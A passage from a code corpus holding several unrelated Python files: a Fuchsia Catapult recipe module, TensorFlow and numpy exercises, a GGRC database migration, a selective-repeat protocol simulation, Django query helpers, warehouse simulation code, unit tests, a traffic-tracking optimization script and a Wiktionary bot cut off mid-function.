target_train,data_train\n","sub_path":"clasreg/bootstrap_znz.py","file_name":"bootstrap_znz.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"395609904","text":"# Copyright 2018 The Fuchsia Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom recipe_engine import recipe_api\n\n\nclass CatapultApi(recipe_api.RecipeApi):\n \"\"\"CatapultApi provides support for the Catapult infra tool.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(CatapultApi, self).__init__(*args, **kwargs)\n self._catapult = None\n\n def __call__(self, *args, **kwargs):\n \"\"\"Return a catapult command step.\"\"\"\n assert self._catapult\n\n subcommand = args[0] # E.g. 'make_histogram' or 'update'\n flags = list(args[1:])\n full_cmd = [self._catapult, subcommand] + flags\n\n name = kwargs.pop('name', 'catapult ' + subcommand)\n return self.m.step(name, full_cmd, **kwargs)\n\n def ensure_catapult(self, version=None):\n with self.m.step.nest('ensure_catapult'):\n with self.m.context(infra_steps=True):\n catapult_package = (\n 'fuchsia/infra/catapult/%s' % self.m.cipd.platform_suffix())\n cipd_dir = self.m.path['start_dir'].join('cipd', 'catapult')\n\n self.m.cipd.ensure(cipd_dir, {catapult_package: version or 'latest'})\n self._catapult = cipd_dir.join('catapult')\n\n return self._catapult\n\n def upload(self, input_file, url, timeout=None, **kwargs):\n \"\"\"\n Uploads performance JSON data to a dashboard.\n\n Args:\n input_file (Path): Full path to the input file to upload.\n url (string): The url to upload data to.\n timeout (string): Optional request timeout duration string. e.g. 12s or\n 1m.\n kwargs: Keyword argments passed to the returned step.\n\n Returns:\n A step to execute the upload subcommand.\n \"\"\"\n args = ['upload', '-url', url]\n if timeout:\n args += ['-timeout', timeout]\n args.append(input_file)\n\n return self(*args, **kwargs)\n","sub_path":"recipe_modules/catapult/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"126441388","text":"import tensorflow as tf\nimport numpy as np\n\nxy = np.loadtxt('train_XOR.txt', unpack=True, dtype='float32')\nx_data = xy[:-1]\ny_data = xy[-1]\nprint(x_data)\nW1_1 = tf.Variable(tf.random_uniform([2,2], -1., 1.))\nb1_1 = tf.Variable(tf.random_uniform([2,4], -1., 1.))\nW2_1 = tf.Variable(tf.random_uniform([1,2], -1., 1.))\nb2_1 = tf.Variable(tf.random_uniform([1,4], -1., 1.))\n\nK1 = tf.sigmoid(tf.matmul(W1_1,x_data)) + b1_1\nK2 = tf.sigmoid(tf.matmul(W2_1,K1)) + b2_1\ncost = tf.reduce_sum(tf.square(K2 - y_data))\ntrain = tf.train.GradientDescentOptimizer(0.1).minimize(cost)\n\ntest = tf.where(K2 > .5,[[1]*4],[[1]*4]) \n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nfor step in range(201):\n sess.run(train)\n if step % 20 == 0:\n print(step, sess.run(cost))\n print(' ', np.round(sess.run(K2)))\n","sub_path":"XOR3.py","file_name":"XOR3.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"207962901","text":"# Copyright (C) 2019 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"\nAdd new ACR Assignee, Verifier, Compliance Contacts and merge Contacts\n\nCreate Date: 2018-08-15 15:19:46.890174\n\"\"\"\n# disable Invalid constant name pylint warning for mandatory Alembic variables.\n# pylint: disable=invalid-name\n\nfrom alembic import op\n\nfrom ggrc.migrations.utils.migrator import get_migration_user_id\nfrom ggrc.migrations.utils import \\\n acr_propagation_constants_scoping_objects_merge_roles \\\n as scoping_objects_rules\nfrom ggrc.migrations.utils import acr_propagation\n\n# revision identifiers, used by Alembic.\nrevision = '210d6ec78436'\ndown_revision = '31cde07a1abe'\n\n\nSCOPING_OBJECTS = [\n \"AccessGroup\",\n \"DataAsset\",\n \"Facility\",\n \"Market\",\n \"Metric\",\n \"OrgGroup\",\n \"Process\",\n \"Product\",\n \"ProductGroup\",\n \"Project\",\n \"System\",\n \"TechnologyEnvironment\",\n \"Vendor\",\n]\n\nNEW_ROLES = [\n \"Assignee\",\n \"Verifier\",\n \"Compliance Contacts\",\n]\n\nMANDATORY = {\n \"Assignee\": 1,\n \"Verifier\": 1,\n \"Compliance Contacts\": 0,\n}\n\nDEFAULT_TO_CURRENT_USER = {\n \"Assignee\": 1,\n \"Verifier\": 1,\n \"Compliance Contacts\": 0,\n}\n\n\ndef _add_roles_for_objects(objects, new_roles):\n \"\"\"\n Creates new roles in acr for a given list of objects.\n :param objects: object names for which new roles should be added\n :param new_roles: list of roles to add into the acr\n \"\"\"\n connection = op.get_bind()\n user_id = get_migration_user_id(connection)\n\n update_entries = []\n for object_name in objects:\n for role_name in new_roles:\n update_entries.append(\n \"('{}', '{}', NOW(), NOW(), {}, 1, {}, {})\".format(\n role_name,\n object_name,\n user_id,\n MANDATORY[role_name],\n DEFAULT_TO_CURRENT_USER[role_name]\n )\n )\n insert_sql = \"\"\"\n INSERT INTO access_control_roles (\n name,\n object_type,\n created_at,\n updated_at,\n modified_by_id,\n non_editable,\n mandatory,\n default_to_current_user\n ) values \"\"\" + \", \".join(update_entries)\n connection.execute(insert_sql)\n\n\ndef upgrade():\n \"\"\"Upgrade database schema and/or data, creating a new revision.\"\"\"\n # Add Assignee, Verifier roles\n _add_roles_for_objects(SCOPING_OBJECTS, NEW_ROLES)\n # Propagate Assignee, Verifier roles\n acr_propagation.propagate_roles(\n scoping_objects_rules.GGRC_NEW_ROLES_PROPAGATION,\n with_update=True\n )\n\n\ndef downgrade():\n \"\"\"Downgrade database schema and/or data back to the previous revision.\"\"\"\n raise Exception(\"Downgrade is not supported.\")\n","sub_path":"src/ggrc/migrations/versions/20180815151946_210d6ec78436_merge_acr_scoping_obj.py","file_name":"20180815151946_210d6ec78436_merge_acr_scoping_obj.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"410902342","text":"import random\nimport pickle\nimport time\n\n#-------------------------------------------------------------------------------------------------------\ntot_frames = 16\nn = 3\nm = pow(2,n)\nframe_send_at_instance = (m // 2)\nsend = []\nrcvd = []\nrcvd_ack = []\nt = 0\narr = []\nduplicate = []\nrw = frame_send_at_instance\nsw = frame_send_at_instance\nfile = ''\nfile = open(\"the.txt\",\"ab\")\nfile.seek(0)\nfile.truncate(0)\npacket = []\nflow = []\npacket1 = []\nsize = 0\n\nfor i in range(tot_frames) :\n arr.append(t)\n t = (t+1)%m\n\nfor i in range(frame_send_at_instance) :\n send.append(arr[i])\n rcvd.append(arr[i])\n rcvd_ack.append('n')\n\n#-------------------------------------------------------------------------------------------------------\n\ndef receiver() :\n global m\n global frame_send_at_instance\n global rcvd_ack\n global send\n global rcvd,flow,tot_frames\n global rw\n global arr\n global sw,duplicate\n global packet,file,packet1,size\n \n while size < tot_frames :\n for i in range(frame_send_at_instance) :\n if rcvd_ack[i] == 'n' :\n f = random.randint(0,9)\n if f != 5 :\n j = 0\n \n while j < frame_send_at_instance :\n if rcvd[j] == send[i] :\n print(\"RECEIVER SIDE : Frame \",rcvd[j],\" received correctly\")\n rcvd[j] = arr[rw]\n rw = (rw+1) % m\n break\n j += 1\n a1 = random.randint(0,4)\n print(\"--------------------------------------------------------------------------------\")\n if a1 == 3 :\n print(\"RECEIVER SIDE : Acknowledgement : \",send[i],\" lost)\")\n packet.append([\"Acknowledgement Lost\",send[i]])\n rcvd_ack[i] = 'n'\n flow.append(1)\n size += 1\n print(\"--------------------------------------------------------------------------------\")\n else :\n print(\"SENDER SIDE : Acknowledgement \",send[i],\" received \")\n packet.append([\"Acknowledgement Received\",send[i]])\n rcvd_ack[i] = 'p'\n flow.append(2)\n size += 1\n print(\"--------------------------------------------------------------------------------\")\n else :\n ld = random.randint(0,1)\n if ld == 0:\n print(\"RECEIVER SIDE : Frame \",send[i],\" is damaged.\")\n packet.append([\"Frame Damaged\",send[i]])\n print(\"RECEIVER SIDE : Negative Acknowledgement \",send[i],\" send\")\n flow.append(3)\n print(\"--------------------------------------------------------------------------------\")\n else :\n print(\"SENDER SIDE : Frame \",send[i],\" is lost\")\n packet.append([\"Frame Lost\",send[i]])\n print(\" Sender Timeouts -- Resend Frame\")\n flow.append(4)\n print(\"--------------------------------------------------------------------------------\")\n \n b = 0\n\n while b < frame_send_at_instance :\n if (rcvd_ack[b] == 'n' and flow[b] == 4) or (rcvd_ack[b] == 'n' and flow[b] == 3) :\n break\n b += 1\n \n i = 0\n\n \n for k in range(b,frame_send_at_instance) :\n \n if rcvd_ack[k] == 'n' and ( flow[k] != 1 and flow[k] != 2 ):\n rcvd_ack[i] = 'n'\n send[i] = send[k]\n packet1.append('yes')\n i+= 1\n\n flow = [] \n if len(packet1) > 0 :\n frame_send_at_instance = len(packet1)\n packet1 = []\n else :\n frame_send_at_instance = 4\n if i != frame_send_at_instance :\n for k in range(i,frame_send_at_instance) :\n send[k] = arr[sw]\n sw = (sw + 1)%m\n rcvd_ack[k] = 'n'\n \n pickle.dump(packet,file)\n print(\"--------------------------------------------------------------------------------\")\n ch = input('Do You want to transfer again : ')\n print(\"--------------------------------------------------------------------------------\")\n if ch == 'y' and size < tot_frames:\n sender()\n else :\n print('All frames send')\n exit()\n\n\n#-------------------------------------------------------------------------------------------------------\n\ndef sender() :\n global m\n global frame_send_at_instance\n global rcvd_ack\n global send\n global duplicate\n global packet,file,packet1,size,tot_frames\n\n if size >= tot_frames :\n print('All frames send')\n time.sleep(5)\n exit()\n elif tot_frames - size < 4 :\n frame_send_at_instance = tot_frames - size\n\n packet = []\n \n print(\"--------------------------------------------------------------------------------\")\n for i in range(frame_send_at_instance) :\n print(\"SENDER : Frame : \",send[i],\" is sent\")\n packet.append(send[i])\n print(\"--------------------------------------------------------------------------------\")\n \n receiver()\n\nsender()\n#-------------------------------------------------------------------------------------------------------\n","sub_path":"SR.py","file_name":"SR.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"369584012","text":"from contextlib import closing\nfrom collections import OrderedDict\nfrom django.db import connection\nfrom rest_framework.exceptions import NotFound\n\nimport json\ndef dictfetchall(cursor):\n \"Return all rows from a cursor as a dict\"\n columns = [col[0] for col in cursor.description]\n return [\n dict(zip(columns, row))\n for row in cursor.fetchall()\n ]\n\ndef dictfetchone(cursor):\n row = cursor.fetchone()\n if row is None:\n return False\n columns = [col[0] for col in cursor.description]\n return dict(zip(columns, row))\n\ndef get_category_products():\n category_products = query_category_products()\n items = []\n for category_product in category_products:\n items.append(\n OrderedDict(\n {\n \"id\": category_product['id'],\n \"title\": category_product['title'],\n \"products\": json.loads(category_product['products']),\n \"slug\": category_product['slug']\n }\n )\n )\n return items\n\ndef query_category_products():\n with closing(connection.cursor()) as cursor:\n cursor.execute(\"\"\"\n with table1 as (SELECT c.*, (SELECT JSONB_AGG(v) FROM (SELECT food_product.* FROM food_product WHERE \n food_product.category_id = c.id) v) AS products FROM food_category c)\n select table1.* from table1 where table1.products is not null;\n \"\"\")\n category_products = dictfetchall(cursor)\n return category_products\n\ndef query_customer(phone_number):\n with closing(connection.cursor()) as cursor:\n cursor.execute(\"\"\" \n SELECT * from food_customer WHERE food_customer.phone_number = %s\n \"\"\", [phone_number])\n customer = dictfetchone(cursor)\n return customer\n\ndef get_customer_by_phone(phone_number):\n customer = query_customer(phone_number)\n return OrderedDict(\n {\n \"id\": customer['id'],\n \"first_name\": customer['first_name'],\n \"last_name\": customer['last_name'],\n \"phone_number\": customer['phone_number']\n }\n )\n\ndef get_products_by_ids(ids):\n with closing(connection.cursor()) as cursor:\n cursor.execute(\n f\"\"\"SELECT * FROM food_product WHERE id in ({str(ids).strip(\"[]\")})\"\"\"\n )\n products = dictfetchall(cursor)\n return products\n\n","sub_path":"mysite/food/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"443431261","text":"from .models import package,robot,shelf,hidden_package,drop_zone\nfrom .models import task\nfrom .models import node as nd\nimport sys\n\nsys.path.insert(0, \"../Warehouse Generation/\")\nfrom server.CentralServer import CentralServer\nfrom server.Robot import Robot, Size\nfrom server.Scheduler import Scheduler\nfrom networking.NetworkInterface import NetworkInterface\nfrom server.Parcel import Parcel\nfrom server.Shelf import Shelf, ShelfInfo\nfrom server.routing.Graph import Graph\nfrom server.sample_db_output import db_output\nfrom warehouse.server_setup import requestParcel,addRobots\nimport threading\n#from warehouse_generator import create_world\nimport json_parser as js\nfrom warehouse_generator import create_world\nimport json\n\ndef sim_json(json_str):\n # floor_size = [4,4]\n\n # sys.path.insert(0, \"../Warehouse Generation/json_parser.py\")\n\n\n print(\"Sim JSON\")\n\n file = open(\"../Warehouse Generation/json.txt\", \"w+\")\n file.write(json_str)\n file.close()\n dic = json.loads(json_str)\n shelveHeight = dic.get('shelveHeight')\n compartments = dic.get('compartments')\n print(dic)\n print(f\"height: {shelveHeight}, compartments: {compartments}\")\n # print(1)\n\n shelf_size = [1, shelveHeight, 1]\n number_of_racks = compartments\n line_distance_from_shelf = 0.2\n # grid_array = [\n # [2,2,2,5],\n # [5,5,5,5],\n # [5,6,6,5],\n # [6,6,6,6],\n # ]\n\n grid_array = js.grid()[0]\n floor_size = js.grid()[1] # gets values from json.txt\n grid_ids = js.grid()[2]\n\n print(grid_ids)\n print(grid_array)\n create_world(\"warehouse.wbt\", floor_size, shelf_size, number_of_racks, line_distance_from_shelf, grid_array, grid_ids)\n print(\"World Successfully generated.\")\n # pass\n\ndef get_connected_nodes(id):\n dictionary = get_node_dict()\n return dictionary.get(id)\n\ndef create_task(r,p,h):\n task.objects.create(robot=r,package=p,holding_package=h)\n\ndef package_request(packs):\n testing = False\n if testing:\n addRobots()\n my_shelf = Shelf(1, 2, 26)\n shelf_info = ShelfInfo(my_shelf, 1)\n parcel = Parcel(12., Size(.35, .35, .35), 16, shelf_info)\n # Create parcel instance from the package\n parcel = Parcel(12., Size(.35, .35, .35), 16, shelf_info)\n t = threading.Thread(target=requestParcel, args=(parcel,), daemon=True)\n t.start()\n else:\n #addRobots()\n #Get dropzone\n for drop in drop_zone.objects.all():\n drop_id = drop.node.id\n #As long as we don't have dropzne in warehouse gen\n if drop_zone.objects.all() == None:\n drop_id = 0 \n for id in packs:\n pack = packs.get(id)\n #print('Parcel:{}'.format(pack.old_id))\n #print('Shelf:{}'.format(pack.shelf))\n #print('Node:{}'.format(pack.shelf.node))\n #Get the shelf the node is in\n shelf = pack.shelf\n #Create shelf instance\n my_shelf = Shelf(shelf.compartment_size, shelf.number_of_compartments, shelf.node.id)\n #Shelf_info from the shelf\n shelf_info = ShelfInfo(my_shelf, pack.shelf_compartment)\n # Create parcel instance from the package\n parcel = Parcel(pack.weight, Size(.35, .35, .35), shelf.node.id, shelf_info)\n t = threading.Thread(target=requestParcel, args=(id, parcel, drop_id), daemon=True)\n t.start()\n #requestParcel(id,parcel,drop_id)","sub_path":"website/design/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"115535461","text":"'''\nCreated on Nov 26, 2014\n\n@author: Iulian\n'''\nimport unittest\nfrom catalog.domain.validators import StudentDisciplineValidator,\\\n DisciplineValidator, StudentValidator\nfrom catalog.domain.entities import Student_Discipline, Discipline, Student\nfrom catalog.repository.repository import Repository\n #StudentDisciplineRepository\nfrom catalog.controller.discipline_controller import DisciplineController\nfrom catalog.controller.student_controller import StudentController\nfrom catalog.controller.student_discipline_controller import StudentDisciplineController\n\nclass StudentDisciplineControllerTestCase(unittest.TestCase):\n def setUp(self):\n self.__DisciplineRepo = Repository(DisciplineValidator())\n d1 = Discipline(1, \"mate\", \"prof mate\")\n d2 = Discipline(2, \"info\", \"prof info\")\n self.__DisciplineRepo.add_item(d1)\n self.__DisciplineRepo.add_item(d2)\n self.__Dctrl = DisciplineController(self.__DisciplineRepo)\n \n self.__StudentRepo = Repository(StudentValidator())\n s1 = Student(3, \"Ion\")\n s2 = Student(2, \"Maria\")\n s3 = Student(1, \"Ionica\")\n self.__StudentRepo.add_item(s1)\n self.__StudentRepo.add_item(s2)\n self.__StudentRepo.add_item(s3)\n self.__Sctrl = StudentController(self.__StudentRepo)\n \n self.__repo = Repository(StudentDisciplineValidator())\n sd = Student_Discipline(1, s1.get_student_id(), d1.get_discipline_id(), 6)\n self.__repo.add_item(sd)\n \n sd = Student_Discipline(2, s2.get_student_id(), d2.get_discipline_id(), 8)\n self.__repo.add_item(sd)\n \n sd = Student_Discipline(4, s3.get_student_id(), d2.get_discipline_id(), 3)\n self.__repo.add_item(sd)\n self.__ctrl = StudentDisciplineController(self.__StudentRepo, self.__DisciplineRepo, self.__repo)\n \n def test_assign_grades_student(self):\n s1d1 = self.__ctrl.assign_grades_student(1, 3, 2, 8)\n assert s1d1.get_student_discipline_id() == 1\n assert s1d1.get_discipline_id() == 2\n assert s1d1.get_student_id() == 3\n assert s1d1.get_grade() == 8\n \n s1d1 = self.__ctrl.assign_grades_student(3, 1, 1, 4)\n assert s1d1.get_discipline_id() == 1\n assert s1d1.get_student_id() == 1\n assert s1d1.get_grade() == 4\n \n def test_student_grade_change(self):\n s1d1 = self.__repo.find_by_id(1)\n s1d1 = self.__ctrl.student_grade_change(s1d1.get_student_discipline_id(), 10)\n assert s1d1.get_discipline_id() == 1\n assert s1d1.get_student_id() == 3\n assert s1d1.get_grade() == 10\n \n def test_get_students_with_disciplines_and_grades(self):\n l = self.__ctrl.get_students_with_disciplines_and_grades()\n assert len(l) == 3\n \n def test_students_and_grades_at_one_discipline_sorted(self):\n l = self.__ctrl.students_and_grades_at_one_discipline_sorted(2)\n assert len(l) == 2\n l = self.__ctrl.students_and_grades_at_one_discipline_sorted(1)\n assert len(l) == 1\n \n def test_students_and_grades_at_one_discipline_sorted_by_grade(self):\n l = self.__ctrl.students_and_grades_at_one_discipline_sorted_by_grade(2)\n assert len(l) == 2\n assert l[0].grade == 8\n assert l[1].grade == 3\n \ndef suite():\n suite = unittest.TestSuite()\n suite.addTests(unittest.TestLoader().loadTestsFromTestCase(StudentDisciplineControllerTestCase))\n return suite\n","sub_path":"Fundamentele programarii/lab 7-9/lab7-9/test/test/catalog/controller/test_student_discipline_controller.py","file_name":"test_student_discipline_controller.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"252396265","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 28 17:59:40 2018\n\n@author: averma\n\"\"\"\n\n\n# =============================================================================\n# #FANCY INDEXING\n# =============================================================================\nimport numpy as np\n\nrand=np.random.RandomState(42)\nx=rand.randint(100, size=10)\nprint(x)\n#Suppose we want to access three different elements. We could do it like this\nindices=[3,7,4]\ny=x[indices]\nprint(y)\n#for 2d array, pass y=x[[...],[...]], the first indecis are rows and second as coulmn, pg79\n#mix both simple and fancy indecies, y=x[2,[...]], 3rd row (means indecies=2) and [...] are coulmns\n#like\nind = np.array([[3, 7],\n [4, 5]])\nx[ind]\n#Fancy indexing also works in multiple dimensions\n\nX = np.arange(12).reshape((3, 4))\nX\n\nrow = np.array([0, 1, 2])\ncol = np.array([2, 1, 3])\nX[row, col]\n\n# =============================================================================\n# Combined Indexing\n# =============================================================================\nprint(X)\nX[2, [2, 0, 1]] #We can combine fancy and simple indices\n\nX[1:, [2, 0, 1]] #combine fancy indexing with slicing\n\nmask = np.array([1, 0, 1, 0], dtype=bool) #combine fancy indexing with masking\nX[row[:, np.newaxis], mask]\n\n#SELECT RANDOM POINTS\n#no repeat\n\nindices=np.random.choice(100,20,replace=False)\nprint(indices)\n\n#modifying values with fancy indexing\nx=np.arange(10)\ni=np.array([1,2,3])\nprint(x)\nx[i]=99\nprint(x)\n\n#if i contains repeated indecies, result may not be as expected\n#us below then\n#np.add.at(x,i,1) #rather than x[i]=x[i]+1\n\n\n","sub_path":"numpy/FancyIndexing.py","file_name":"FancyIndexing.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"367279976","text":"import program as program\nimport modules.settings as settings\nimport time\nimport json\nprog = program.Program(settings.Settings())\n\n\ndef test_change_interval_task():\n assert program.change_interval_task('test', 20, prog) == 20\n program.cancel_task('test')\n assert program.change_interval_task('test', 20) is None\n\n\ndef test_get_social_rating():\n prog.settings.subjects = ['max verstappen']\n assert len(prog.get_current_social_rating()) > 0\n\n\ndef test_program_mqtt():\n prog.MQTT.subscribe_topic(\"pacotinie@gmail.com/app\")\n prog.MQTT.send_message(\"test\")\n time.sleep(1) # sleep because sending the message takes time\n assert prog.MQTT.messages[0] == \"test\"\n prog.MQTT.retrieve_message()\n\n\ndef test_check_messages_program():\n msg = prog.check_messages()\n assert msg == None\n prog.MQTT.messages.append(\"testvalue\")\n msg = prog.check_messages()\n assert msg == \"testvalue\"\n\n\ndef test_process_messages():\n prog.MQTT.subscribe_topic(\"pacotinie@gmail.com/app\")\n prog.settings.mode = 'weather'\n prog.settings.brightness = '50'\n # request\n prog.process_messages(\"request|settings\")\n time.sleep(1)\n msg = prog.MQTT.retrieve_message()\n msg_escaped = msg.replace(\"'\", '\"')\n msg_json = json.loads(msg_escaped)\n assert msg_json['mode'] == 'weather'\n prog.process_messages(\"request|mode\")\n time.sleep(1)\n msg = prog.MQTT.retrieve_message()\n assert msg == 'weather'\n # settings\n prog.process_messages(\"settings|{'mode': 'social', 'refresh_interval': 5, 'future_forecast_time': 1, 'brightness': 50, 'subjects': ['max verstappen'], 'location': {'latitude': 51.57046107093778, 'longitude': 5.050113150625251}}\")\n assert prog.settings.mode == 'social'\n # save specific\n assert prog.settings.brightness == 50\n prog.process_messages(\"brightness|70\")\n assert prog.settings.brightness == 70\n\n\ndef test_handle_weather():\n assert prog.handle_weather() is not False\n","sub_path":"RPI/tests/program_test.py","file_name":"program_test.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"388789845","text":"def ex1(filename):\n \n # load initial parameters from x.txt\n f = open(filename, 'r+')\n l = f.readline()\n x = [s for s in l.strip().split(\" \")]\n f.close()\n \n # create para-value list\n para = paraValueList(x)\n \n \"\"\"#load video sequence record\n record = sequenceRecord()\"\"\"\n \n # run process including trackingfeature, groupfeature, load groundtruth, compute mota\n print(process(para))\n\n\ndef paraValueList(x):\n #create para-value list\n #list of the 8 parameters and their values\n pn = 8\n p = pn*[None]\n p[0] = '--feature-quality' #[0-0.4]\n p[1] = '--min-feature-distanceklt' #[0-6] \n p[2] = '--window-size' #[3-10]integer\n p[3] = '--min-tracking-error' #[0.01-0.3]\n p[4] = '--min-feature-time' #[2-100]integer\n p[5] = '--mm-connection-distance' #[1.5-100]\n p[6] = '--mm-segmentation-distance' #[1-100]\n p[7] = '--min-nfeatures-group' #[2-4]\n \n para = []\n for n in range(pn):\n para = para + [p[n],x[n]]\n \n return para\n\n\ndef process(para):\n Mota = []\n gtDatabaseaAbsPaths = []\n\n cwd = os.getcwd()\n # move to the location of the intersection\n os.chdir(intersectionAbsPath)\n\n # find all folders in the intersection directory\n folder = [file for file in os.listdir() if os.path.isdir(file)]\n # find dates with visible data\n for date in folder:\n visibleDataDate = date + \"/Visible/\"\n if os.path.exists(visibleDataDate):\n # iterate through all the files to find ground truth sqlite files\n gtDatabaseaAbsPaths.append([os.path.abspath(visibleDataDate + file) for file in os.listdir(visibleDataDate)\n if file.endswith(\"_gt.sqlite\")][0])\n\n for gtDatabaseAbsPath in gtDatabaseaAbsPaths:\n configFilename = os.path.abspath(os.path.join(gtDatabaseAbsPath, \"../../..\")) + \"/tracking-visible.cfg\"\n gtDatabaseBasename = gtDatabaseAbsPath[:-10]\n videoFilename = gtDatabaseBasename + \".MP4\"\n databaseFilename = gtDatabaseBasename + \".sqlite\"\n gtDatabaseDirname = os.path.dirname(gtDatabaseAbsPath)\n homographyFilename = gtDatabaseDirname + \"/homography.txt\"\n maskFilename = gtDatabaseDirname + \"/mask.png\"\n # Skip feature tracking if the user specified to optimize only grouping parameters\n if not args.optimizeGroupingOnly:\n # Track features\n trackingFeature(para, configFilename, videoFilename, databaseFilename, homographyFilename, maskFilename)\n # Group features\n groupFeature(para, configFilename, videoFilename, databaseFilename, homographyFilename, maskFilename)\n #load trajectory\n objects = storage.loadTrajectoriesFromSqlite(databaseFilename, 'object')\n #load ground truth\n annotations = storage.loadTrajectoriesFromSqlite(gtDatabaseAbsPath, 'object')\n # Appending negative mota because nomad minimizes the output\n Mota.append(-computeMota(annotations, objects, Mota))\n \n # Change to the previous directory\n os.chdir(cwd)\n\n return np.mean(Mota)\n\n\ndef trackingFeature(para, config, video, db, homo, mask):\n # remove previous tracking\n if os.path.exists(db):\n os.remove(db)\n # trackingfeature command parameters\n tf = ['feature-based-tracking', config, '--tf', '--video-filename', video, '--database-filename', db, '--homography-filename', homo, '--mask-filename', mask]\n # run in command line and print directly\n subprocess.check_output(tf + para[0:10])\n\ndef groupFeature(para, config, video, db, homo, mask):\n #remove previous grouping\n storage.deleteFromSqlite(db, 'object')\n #groupfeature command parameters\n gf = ['feature-based-tracking', config, '--gf', '--video-filename', video, '--database-filename', db, '--homography-filename', homo, '--mask-filename', mask]\n #run in command line and print directly\n subprocess.check_output(gf + para[10:16])\n\ndef computeMota(annotations, objects, Mota):\n matchingDistance = 500\n firstInstant = 0\n lastInstant = 50000\n return moving.computeClearMOT(annotations, objects, matchingDistance, firstInstant, lastInstant)[1]\n\n\nif __name__ == \"__main__\":\n import argparse\n import pickle\n import sys\n from trafficintelligence import moving, storage\n import numpy as np\n #from numpy import loadtxt\n #from numpy.linalg import inv\n import subprocess\n import os\n\n # Load args that were given with select-arguments.py\n f = open('arguments.pckl', 'rb')\n args = pickle.load(f)\n f.close()\n\n intersectionAbsPath = os.path.abspath(args.intersection)\n\n ex1(sys.argv[1])\n sys.exit(0)\n","sub_path":"methodology/optimization/tracking-mota.py","file_name":"tracking-mota.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"543688510","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Convert expressions like {{affix|ru|кот|alt1=ко́то-|кафе́|tr2=kafɛ́}} to {{affix|ru|кот|-о-|кафе́|tr3=kafɛ́}}.\n\nimport pywikibot, re, sys, argparse\n\nimport blib\nfrom blib import getparam, rmparam, msg, site, tname\n\nimport rulib\nimport ruheadlib\n\netym_change = False\n\ndef stringize_heads(heads):\n return \",\".join(\"%s%s%s\" % (\n ru, \"//%s\" % tr if tr else \"\", \"[lemma]\" if is_lemma else \"\")\n for ru, tr, is_lemma in heads)\n\ndef find_stress(term, pagemsg):\n # Look up a term to find its accented form. If it's monosyllabic or\n # already stressed, this isn't necessary. At the point we're called,\n # there's no tr1= param; we skipped that case.\n if rulib.is_monosyllabic(term) or rulib.is_stressed(term):\n return term, None\n if term.endswith(\"ый\") and rulib.is_monosyllabic(term[:-2]):\n return rulib.make_beginning_stressed_ru(term), None\n cached, info = ruheadlib.lookup_heads_and_inflections(term, pagemsg)\n if info is None:\n pagemsg(\"WARNING: Can't accent, page doesn't exist: %s\" % term)\n elif info == \"redirect\":\n # FIXME, should follow redirects\n pagemsg(\"WARNING: Can't accent, page is a redirect: %s\" % term)\n elif info == \"no-russian\":\n pagemsg(\"WARNING: Can't accent, page has no Russian section: %s\" % term)\n else:\n heads, inflections_of, adj_forms = info\n heads_ignoring_lemma = set((ru, tr) for ru, tr, is_lemma in heads)\n if len(heads_ignoring_lemma) == 1:\n return list(heads_ignoring_lemma)[0]\n elif len(heads_ignoring_lemma) == 0:\n pagemsg(\"WARNING: Can't accent, no heads on page: %s\" % term)\n else:\n pagemsg(\"WARNING: Can't accent, multiple accented forms on page %s: %s\" %\n (term, stringize_heads(heads)))\n return term, None\n\ndef process_text_on_page(index, pagetitle, text):\n global args\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n notes = []\n found_affix = False\n\n parsed = blib.parse_text(text)\n\n for t in parsed.filter_templates():\n origt = str(t)\n tn = tname(t)\n\n if tn in [\"compound\", \"com\"]:\n lang = getparam(t, \"lang\")\n if (lang or getparam(t, \"1\")) != \"ru\":\n continue\n if lang:\n # Fetch all params, moving numbered params over to the right by one.\n params = [(\"1\", lang, False)]\n for param in t.params:\n pname = str(param.name)\n if re.search(\"^[0-9]+$\", pname):\n params.append((str(int(pname) + 1), param.value, param.showkey))\n elif pname != \"lang\":\n params.append((pname, param.value, param.showkey))\n # Erase all params.\n del t.params[:]\n # Put back parameters in order.\n for name, value, showkey in params:\n t.add(name, value, showkey=showkey, preserve_spacing=False)\n t.name = \"affix\"\n pagemsg(\"Replaced <%s> with <%s>\" % (origt, str(t)))\n notes.append(\"convert {{compound}} to {{affix}}\")\n origt = str(t)\n tn = tname(t)\n\n if tn in [\"affix\", \"af\"]:\n if getparam(t, \"1\") != \"ru\":\n continue\n m = re.search(r\"\\n(.*?%s.*?)\\n\" % re.escape(origt), text)\n if not m:\n pagemsg(\"WARNING: Something wrong, can't find template in text: %s\" % origt)\n continue\n line = 